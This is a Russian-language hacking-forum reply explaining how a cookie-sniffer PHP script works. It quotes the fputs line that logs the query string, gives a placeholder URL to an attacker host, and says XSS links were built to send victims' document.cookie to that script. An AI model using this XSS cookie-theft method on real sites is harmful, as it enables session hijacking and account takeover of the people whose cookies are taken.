Сообщение от
GRAVITY
Нупский вопрос - а он не ворует куки получается:? По крайней мере в логах не увидел
Ёпт! А если я бы написал "вид логов такой: [antichat.ru]:пиписька" ты бы спросил, "а что, он получается пиписьки с ачата ворует!? Это примерный вид того, что получается в итоге.
в пхп у нас написано вот что:
PHP код:
fputs($fp, " <br><br><br>_________[".date("d.m.y H:i")."]<br>".
$_SERVER['QUERY_STRING']."<br><br>".
Это значит, скрипт записывает в логи значение переменной $_SERVER['QUERY_STRING'], а она берётся если в адресной строке написать линк следующего вида
Код:
http://your_site.net/script.php?some_text
В моем случае после "?" была стрка hotlog=1, поэтому в логи записалось это:
Код:
h=[www.some_site.ru]:hotlog=1
Я специально формировал ссылки с XSS чтобы скрипт обращялся к пхп-скрипту и после знака вопроса выставлял document.cookie.
Если ещё не понятно, спрашивай, отвечу.